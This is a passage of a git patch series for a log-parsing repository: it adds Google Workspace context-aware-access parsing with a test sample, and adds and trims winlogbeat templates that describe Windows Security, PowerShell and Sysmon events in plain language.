IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } +} \ No newline at end of file From 8bcde47c77e71b93d99f114695639467987b3d16 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Thu, 14 Nov 2024 16:42:34 +0100 Subject: [PATCH 18/84] Add context access service --- Google Cloud/google-report/_meta/fields.yml | 5 ++ .../_meta/smart-descriptions.json | 18 ++++++ Google Cloud/google-report/ingest/parser.yml | 10 ++++ .../tests/test_access_sample_1.json | 58 +++++++++++++++++++ 4 files changed, 91 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_access_sample_1.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..4fc31cc4b 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -1,3 +1,8 @@ +google.report.access.application: + description: Application name + name: google.report.access.application + type: keyword + google.report.actor.email: description: '' name: google.report.actor.email diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..51fcc1837 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -168,6 +168,24 @@ } ] }, + { + "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}", + "conditions": [ + { + "field": "network.application", + "value": "context_aware_access" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + }, + { + "field": "google.report.access.application" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..25f2888b2 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -1,4 +1,5 @@ name: google-report +ignored_values: ["UNKNOWN"] pipeline: - name: json_event external: @@ -28,6 +29,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_context_aware_fields + filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -258,3 +261,10 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_context_aware_fields: + actions: + - set: + event.type: ["denied"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' + google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json new file mode 100644 index 000000000..e83076db1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_access_sample_1.json @@ -0,0 +1,58 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + "report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } +} \ No newline at end of file From 4f2e1bfea597d812bf2dcb478bebdc59684e770d Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 16:57:21 +0100 Subject: [PATCH 19/84] Updated smart descriptions --- .../winlogbeat/_meta/smart-descriptions.json | 1129 +++++++++++++++++ 1 file changed, 1129 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index eb6a595a2..5eaf6dc64 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1,4 +1,1133 @@ [ + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserSid", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged off from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4634 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.TargetServerName", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.TargetServerName", + "value": "localhost" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "action.properties.ObjectName", + "type": "accessed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4662 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "user.name", + "target": "process.parent.executable", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "jost.hostname", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.executable", + "target": "host.hostname", + "type": "executed on" + }, + { + "source": "process.parent.executable", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4688 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Process {process.name} exited. It was executed by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.executable", + "type": "executed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4689 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "created account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4720 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "enabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4722 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} changed their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "changed their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "failed to change their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "disabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4725 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "deleted account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4726 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4727 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4742 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created security-disabled local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created security-disabled local group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4744 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4750 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to log authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "authenticated from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was denied a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was granted a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4771 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{action.properties.TargetUserName} successfully authenticated on {action.properties.Workstation}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated local groups of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4798 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated members of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4799 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}", + "relationships": [ + { + "source": "user.name", + "target": "log.hostname", + "type": "wad denied RDP access to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4825 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "accessed network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "failed to access network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "accessed shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "failed to access shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4103 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.id} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Started invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4105 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Completed invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4106 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Process {process.executable} changed the creation time of the file {file.name} on {host.name}", + "relationships": [ + { + "source": "process.executable", + "target": "file.name", + "type": "changed creation time of" + }, + { + "source": "process.executable", + "target": "host.name", + "type": "executed on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 2 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}", + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 3 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{file.name} created by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 11 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}", + "conditions": [ + { + "field": "action.id", + "value": 12 + }, + { + "field": "action.properties.MessEventType", + "value": "CreateValue" + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry key {registry.key} set by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 13 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Sysmon configuration was updated on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 16 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})", + "conditions": [ + { + "field": "action.id", + "value": 22 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, { "value": "Auditing event on {winlog.computer_name}: {event.action}", "conditions": [ From a68dec425ee56f45f66ae948e194e23595e86436 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 17:44:03 +0100 Subject: [PATCH 20/84] Small fixes --- .../winlogbeat/_meta/smart-descriptions.json | 51 ------------------- 1 file changed, 51 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index 5eaf6dc64..a3b786729 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1134,12 +1134,6 @@ { "field": "winlog.provider_guid", "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "event.action" } ] }, @@ -1149,15 +1143,6 @@ { "field": "winlog.provider_guid", "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "winlog.SubjectUserSid" - }, - { - "field": "event.action" } ] }, @@ -1171,15 +1156,6 @@ { "field": "event.action", "value": "Filtering Platform Connection" - }, - { - "field": "winlog.computer_name" - }, - { - "field": "winlog.event_data.SourceAddress" - }, - { - "field": "winlog.event_data.DestAddress" } ] }, @@ -1189,12 +1165,6 @@ { "field": "winlog.provider_guid", "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" - }, - { - "field": "host.hostname" - }, - { - "field": "event.original" } ] }, @@ -1204,12 +1174,6 @@ { "field": "winlog.provider_guid", "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" - }, - { - "field": "winlog.opcode" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1219,9 +1183,6 @@ { 